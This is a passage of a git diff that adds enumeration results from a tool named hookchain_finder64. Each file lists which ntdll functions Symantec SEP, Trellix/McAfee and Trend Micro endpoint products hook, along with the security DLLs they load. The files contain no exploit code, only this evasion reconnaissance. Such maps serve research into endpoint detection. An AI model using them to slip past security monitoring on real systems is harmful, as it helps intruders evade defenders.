+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff7a3fc0000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffa4b9d0000.
+C:\Windows\system32\hmpalert.dll is loaded at 0x00007ffa48e50000.
+C:\WINDOWS\System32\KERNEL32.dll is loaded at 0x00007ffa4a1f0000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffa49360000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffa46890000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffa4a070000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/symantec_sep.txt b/enum/results_enum/symantec_sep.txt
new file mode 100644
index 0000000..70469e2
--- /dev/null
+++ b/enum/results_enum/symantec_sep.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+NtQuerySystemTime is hooked
+Mapped 456 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hook\hookchain_finder64.exe is loaded at 0x00007ff7b4960000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffecb420000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffecb020000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffec87a0000.
+C:\Windows\system32\apphelp.dll is loaded at 0x00007ffec5dc0000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffecac60000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/trellix.txt b/enum/results_enum/trellix.txt
new file mode 100644
index 0000000..4564ef5
--- /dev/null
+++ b/enum/results_enum/trellix.txt
@@ -0,0 +1,109 @@
+[+] Listing ntdll Nt/Zw functions
+NtAlertResumeThread is hooked
+NtCreateThreadEx is hooked
+NtDuplicateToken is hooked
+NtGetContextThread is hooked
+NtMapViewOfSection is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff60b2d0000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffb23190000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ffb211e0000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffb20cf0000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffb1e190000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffb21750000.
+C:\Program Files\Common Files\McAfee\SystemCore\mfehcinj.dll is loaded at 0x00007ffaeb7a0000.
+C:\WINDOWS\System32\RPCRT4.dll is loaded at 0x00007ffb22dc0000.
+C:\WINDOWS\System32\ADVAPI32.dll is loaded at 0x00007ffb21c00000.
+C:\WINDOWS\System32\sechost.dll is loaded at 0x00007ffb212a0000.
+C:\WINDOWS\System32\bcrypt.dll is loaded at 0x00007ffb21160000.
+C:\WINDOWS\System32\WINTRUST.dll is loaded at 0x00007ffb20ff0000.
+C:\WINDOWS\System32\CRYPT32.dll is loaded at 0x00007ffb20ad0000.
+C:\WINDOWS\System32\ucrtbase.dll is loaded at 0x00007ffb21060000.
+C:\WINDOWS\SYSTEM32\MSASN1.dll is loaded at 0x00007ffb20350000.
+C:\Program Files\Common Files\McAfee\SystemCore\mfehcthe.dll is loaded at 0x00007ffaeb920000.
+C:\Program Files\McAfee\MAR\mvcairo_x64.dll is loaded at 0x00007ffaeb8a0000.
+C:\WINDOWS\System32\USER32.dll is loaded at 0x00007ffb213a0000.
+C:\WINDOWS\System32\win32u.dll is loaded at 0x00007ffb20cc0000.
+C:\WINDOWS\System32\GDI32.dll is loaded at 0x00007ffb221c0000.
+C:\WINDOWS\System32\gdi32full.dll is loaded at 0x00007ffb209b0000.
+C:\WINDOWS\System32\msvcp_win.dll is loaded at 0x00007ffb20860000.
+C:\WINDOWS\System32\ole32.dll is loaded at 0x00007ffb215f0000.
+C:\WINDOWS\System32\combase.dll is loaded at 0x00007ffb21870000.
+C:\WINDOWS\System32\OLEAUT32.dll is loaded at 0x00007ffb21fc0000.
+C:\WINDOWS\System32\IMM32.DLL is loaded at 0x00007ffb21bd0000.
+C:\Program Files\McAfee\Endpoint Security\Adaptive Threat Protection\mfedeeprem64.dll is loaded at 0x00007ffb1e0b0000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at mfehcinj.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at RPCRT4.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at ADVAPI32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at sechost.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at bcrypt.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at WINTRUST.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at CRYPT32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at MSASN1.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at mfehcthe.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at USER32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at GDI32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at gdi32full.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at ole32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at combase.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at OLEAUT32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at IMM32.DLL IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/trend.txt b/enum/results_enum/trend.txt
new file mode 100644
index 0000000..165045d
--- /dev/null
+++ b/enum/results_enum/trend.txt
@@ -0,0 +1,69 @@
+[+] Listing ntdll Nt/Zw functions
+NtCreateMutant is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtGetContextThread is hooked
+NtLoadDriver is hooked
+NtMapViewOfSection is hooked
+NtProtectVirtualMemory is hooked
+NtQueryInformationThread is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtReadVirtualMemory is hooked
+NtSetContextThread is hooked
+NtSetInformationThread is hooked
+NtTerminateProcess is hooked
+NtUnmapViewOfSection is hooked
+NtUnmapViewOfSectionEx is hooked
+NtWriteVirtualMemory is hooked
+Mapped 491 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff649120000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffb66ef0000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffb65c20000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffb64290000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffb66bf0000.
+C:\Windows\system32\tmumh\20019\AddOn\\TmUmEvt64.dll is loaded at 0x00007ffb51ab0000.
+C:\Windows\System32\PSAPI.DLL is loaded at 0x00007ffb66ea0000.
+C:\Windows\System32\ADVAPI32.dll is loaded at 0x00007ffb66b20000.
+C:\Windows\System32\sechost.dll is loaded at 0x00007ffb64da0000.
+C:\Windows\System32\bcrypt.dll is loaded at 0x00007ffb64260000.
+C:\Windows\System32\RPCRT4.dll is loaded at 0x00007ffb65560000.
+C:\Windows\system32\tmumh\20019\TmMon\\tmmon64.dll is loaded at 0x0000000070ee0000.
+C:\Windows\System32\TmLWE\TmUmSnsr64\\TmUmSnsr64.dll is loaded at 0x00007ffb46f50000.
+C:\Windows\SYSTEM32\kernel.appcore.dll is loaded at 0x00007ffb63230000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at PSAPI.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at ADVAPI32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at sechost.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at bcrypt.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at RPCRT4.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at kernel.appcore.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file